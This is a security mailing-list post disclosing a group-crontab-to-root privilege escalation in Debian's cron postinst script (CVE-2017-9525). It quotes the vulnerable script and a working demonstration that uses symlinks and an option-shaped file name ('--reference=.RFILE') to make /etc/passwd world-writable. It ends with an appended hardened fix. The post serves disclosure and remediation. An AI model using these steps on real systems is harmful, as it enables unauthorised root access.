Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
Date: Fri, 9 Jun 2017 20:31:24 +0200
From: Salvatore Bonaccorso <carnil@...ian.org>
To: oss-security@...ts.openwall.com
Subject: Re: Vixie/ISC Cron group crontab to root escalation

Hi

On Thu, Jun 08, 2017 at 08:05:34PM +0200, Solar Designer wrote:
> In 2003, the original patch went from Owl into Debian (and thus Ubuntu),
> along with the original comment above:
> 
> https://anonscm.debian.org/cgit/pkg-cron/pkg-cron.git/commit/?id=ce8f4773590dd76505631bd71874e999a85de607
> 
> Thanks to Salvatore Bonaccorso of Debian for locating the above URL for
> the current discussion.  In there, we also see the addition of a
> postinst script changing permissions on existing crontab files.  This
> was also pointed out by Seth Arnold of Ubuntu, who wrote:
> 
> | - postinst scripts are already brittle
> | - postinst scripts themselves become a target for elevating privileges if
> |   they'll just set the permissions as needed
> | 
> | But the Debian/Ubuntu packaging already has scripts for this purpose:
> | 
> | http://sources.debian.net/src/cron/3.0pl1-128/debian/postinst/#L53
> | 
> | ...
> | # Fixup crontab , directory and files for new group 'crontab'.
> | # Can't use dpkg-statoverride for this because it doesn't cooperate nicely
> | # with cron alternatives such as bcron
> | if [ -d $crondir/crontabs ] ; then
> |     chown root:crontab $crondir/crontabs
> |     chmod 1730 $crondir/crontabs
> |     # This used to be done conditionally. For versions prior to "3.0pl1-81"
> |     # It has been disabled to suit cron alternative such as bcron.
> |     cd $crondir/crontabs
> |     set +e
> |     ls -1 | xargs -r -n 1 --replace=xxx  chown 'xxx:crontab' 'xxx'
> |     ls -1 | xargs -r -n 1 chmod 600
> |     set -e
> | fi
> 
> Qualys promptly broke this script, replying to Seth:
> 
> | Hmmm, you're right, the script itself is vulnerable to
> | group-crontab-to-root escalation of privileges:
> | 
> | root@...ian:~# usermod --append --groups crontab nobody
> | root@...ian:~# su --login --shell /bin/bash nobody
> | No directory, logging in with HOME=/
> | 
> | nobody@...ian:/$ id
> | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),107(crontab)
> | 
> | nobody@...ian:/$ cd /var/spool/cron/crontabs
> | 
> | # for example, this exploits the chown
> | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd- nobody
> | 
> | # for example, this exploits the chmod
> | nobody@...ian:/var/spool/cron/crontabs$ touch ./--reference=.RFILE
> | nobody@...ian:/var/spool/cron/crontabs$ chmod 0666 .RFILE > .RFILE
> | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd 600
> | 
> | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd*
> | -rw-r--r-- 1 root root 1378 May 10 17:16 /etc/passwd
> | -rw------- 1 root root 1378 May 10 17:16 /etc/passwd-
> | 
> | # run the postinst script
> | root@...ian:~# dpkg-reconfigure cron
> | chown: missing operand
> | Try 'chown --help' for more information.
> | update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
> | 
> | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd*
> | -rw-rw-rw- 1    600 crontab 1378 May 10 17:16 /etc/passwd
> | -rw------- 1 nobody crontab 1378 May 10 17:16 /etc/passwd-
> | 
> | So this is a known issue?  (there may be more ways to exploit it --
> | spaces, newlines, option injections, etc).
> 
> So this looked like two issues to fix: the temporary file hard link
> attack (in OpenBSD, Debian, Ubuntu, ALT Linux, and Owl) and the postinst
> script (in Debian and Ubuntu).

For the record, the Debian and Ubuntu specific issue with the postinst
script has been assigned CVE-2017-9525.

For further discussion with the Debian cron maintainers I have also
opened https://bugs.debian.org/864466

Regards,
Salvatore
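A hardened form of the quoted postinst fixup loop, as an added example (not code from this thread or from Debian's cron package), exercised against the same hostile file names the Qualys demo used: an option-looking name and a symlink pointing outside the spool. The function names `fixup_crontab_perms`, `make_demo_spool` and `mode`, the temporary directory layout and the constructed file names are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread or the cron package. The quoted script ran
# "ls -1 | xargs chown/chmod" as root inside a directory writable by group
# crontab, so a crontab named like an option ("--reference=.RFILE") or a
# symlink ("600" -> /etc/passwd) could redirect the privileged chown/chmod.
# Here find selects regular files only (without -L it does not follow
# symlinks), hands the paths to chmod via -exec (no word splitting, no xargs),
# and "--" ends option parsing so a name can never be read as a flag.
# Caveat: a file owner can still swap a regular file for a symlink between
# find's check and chmod's action; this closes the two vectors shown above,
# not that race, so the loop should not be relied on against a hostile spool.
fixup_crontab_perms() {
    dir=$1
    # The original chown line would be hardened the same way, e.g.
    #   find "$dir" -mindepth 1 -maxdepth 1 -type f \
    #       -exec sh -c 'for f; do chown -- "${f##*/}:crontab" "$f"; done' sh {} +
    # It is left out here because it needs root and a "crontab" group.
    find "$dir" -mindepth 1 -maxdepth 1 -type f -exec chmod 600 -- {} +
}

# Constructed spool directory mirroring the attacker-controlled names from
# the demo above (hypothetical layout); prints the base directory path.
make_demo_spool() {
    base=$(mktemp -d)
    mkdir "$base/crontabs" "$base/outside"
    printf '* * * * * true\n' > "$base/crontabs/alice"   # ordinary crontab
    chmod 644 "$base/crontabs/alice"
    touch "$base/crontabs/--reference=.RFILE"             # option-shaped name
    touch "$base/crontabs/.RFILE"
    chmod 666 "$base/crontabs/.RFILE"
    printf 'x\n' > "$base/outside/target"                 # stands in for /etc/passwd
    chmod 644 "$base/outside/target"
    ln -s "$base/outside/target" "$base/crontabs/600"     # symlink named "600"
    echo "$base"
}

# Octal mode of a path (GNU stat); used to check results.
mode() { stat -c '%a' "$1"; }
```

After `fixup_crontab_perms "$base/crontabs"`, every regular crontab (including the one named `--reference=.RFILE`) is mode 600 while the symlink target outside the spool keeps its original mode.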
